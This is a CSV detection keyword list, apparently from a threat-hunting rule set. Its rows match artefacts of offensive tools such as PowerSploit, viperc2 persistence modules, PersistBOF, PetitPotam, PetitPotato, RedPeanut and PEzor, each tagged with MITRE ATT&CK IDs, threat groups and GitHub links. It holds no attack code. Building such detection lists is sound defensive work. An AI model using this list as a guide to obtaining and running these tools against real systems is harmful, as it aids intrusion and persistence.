"*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Persistence/InstallWMI*",".{0,1000}Persistence\/InstallWMI.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Persistence_AccountManipulation_Windows.py*",".{0,1000}Persistence_AccountManipulation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_Guard_Windows.py*",".{0,1000}Persistence_Guard_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_LogonScripts_Windows.py*",".{0,1000}Persistence_LogonScripts_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_NewService_Windows.py*",".{0,1000}Persistence_NewService_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_OfficeApplicationStartup_OfficeTest.py*",".{0,1000}Persistence_OfficeApplicationStartup_OfficeTest\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_Other_WindowsLibraryMs.py*",".{0,1000}Persistence_Other_WindowsLibraryMs\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_RegistryRunKeys_SharpHide.py*",".{0,1000}Persistence_RegistryRunKeys_SharpHide\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_RegistryRunKeys_Windows.py*",".{0,1000}Persistence_RegistryRunKeys_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_ScheduledTask_Windows.py*",".{0,1000}Persistence_ScheduledTask_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence_WinlogonHelperDLL_Windows.py*",".{0,1000}Persistence_WinlogonHelperDLL_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Persistence-Accessibility-Features-master*",".{0,1000}Persistence\-Accessibility\-Features\-master.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*PersistenceBOF.c*",".{0,1000}PersistenceBOF\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersistenceBOF.exe*",".{0,1000}PersistenceBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persistent-security/SMShell*",".{0,1000}persistent\-security\/SMShell.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*persist-ice-junction.o*",".{0,1000}persist\-ice\-junction\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-monitor.o*",".{0,1000}persist\-ice\-monitor\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-shortcut.o*",".{0,1000}persist\-ice\-shortcut\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-time.o*",".{0,1000}persist\-ice\-time\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*persist-ice-xll.o*",".{0,1000}persist\-ice\-xll\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*PersStartup.cs*",".{0,1000}PersStartup\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*PEScrambler.exe*",".{0,1000}PEScrambler\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*PetitPotam bypass via RPC_C_AUTHN_LEVEL_PKT_PRIVACY*",".{0,1000}PetitPotam\sbypass\svia\sRPC_C_AUTHN_LEVEL_PKT_PRIVACY.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotam.cna*",".{0,1000}PetitPotam\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.cpp*",".{0,1000}PetitPotam\.cpp.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.exe*",".{0,1000}PetitPotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.ps1*",".{0,1000}PetitPotam\.ps1.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*petitpotam.py*",".{0,1000}petitpotam\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PetitPotam.py*",".{0,1000}PetitPotam\.py.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam.sln*",".{0,1000}PetitPotam\.sln.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*PetitPotam.vcxproj*",".{0,1000}PetitPotam\.vcxproj.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*PetitPotam:main*",".{0,1000}PetitPotam\:main.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*petitpotam_check*",".{0,1000}petitpotam_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*PetitPotamModified.exe*",".{0,1000}PetitPotamModified\.exe.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*PetitPotato 3 cmd*",".{0,1000}PetitPotato\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.Build.CppClean.log,*",".{0,1000}PetitPotato\.Build\.CppClean\.log,.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.exe*",".{0,1000}PetitPotato\.exe.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PetitPotato.lastbuildstate*",".{0,1000}PetitPotato\.lastbuildstate.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*PEzor generated Beacon Object File*",".{0,1000}PEzor\sgenerated\sBeacon\sObject\sFile.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*PEzor!! v*",".{0,1000}PEzor!!\sv.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" 